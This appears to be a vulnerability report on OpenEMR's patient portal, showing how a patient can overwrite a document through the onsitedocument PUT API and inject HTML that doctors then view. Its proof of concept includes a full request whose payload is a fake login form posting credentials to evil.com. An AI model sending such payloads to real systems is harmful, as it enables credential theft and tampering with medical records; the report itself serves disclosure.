Description

It looks like through the PUT request, a Patient can rewrite it’s own document via the fullDocument JSON parameter. In this way a malicious user patient can’t override the document form and rewrite his own, also injecting valid HTML code that the Doctor would be able to see.

Proof of Concept

• Login on http://demo.openemr.io/openemr/portal/home.php as Patient
• Go to “My Documents section”, and open for example “Insurance Info”
• You will see a regular form, now change something in the form, and click on Save, it will trigger a PUT request on /openemr/portal/patient/api/onsitedocument/<ID> endpoint.
• You will notice that there is a fullDocument JSON param, that value can be changed.
• Trigger a request like this:

PUT /openemr/portal/patient/api/onsitedocument/7 HTTP/1.1
Host: demo.openemr.io

{"id":"2","pid":"1","facility":"0","provider":"0","encounter":"0","createDate":"2022-12-26 04:18:41","docType":"Insurance Info","patientSignedStatus":"0","patientSignedTime":"0000-00-00 00:00:00","authorizeSignedTime":"0000-00-00 00:00:00","acceptSignedStatus":"0","authorizingSignator":"","reviewDate":"0000-00-00 00:00:00","denialReason":"In review","authorizedSignature":"","patientSignature":"","fullDocument":"<h3>please provide your username and password:</h3><br>&lt;form method='post' action='//evil.com/login.php'&gt;username:&lt;input type='text' name='username' /&gt;<br />password: &lt;input type='password'  name='password'&gt;<br />&lt;input type='submit' value='login' /&gt;&lt;/form&gt;<br /><a href="//evil.com">click here</a>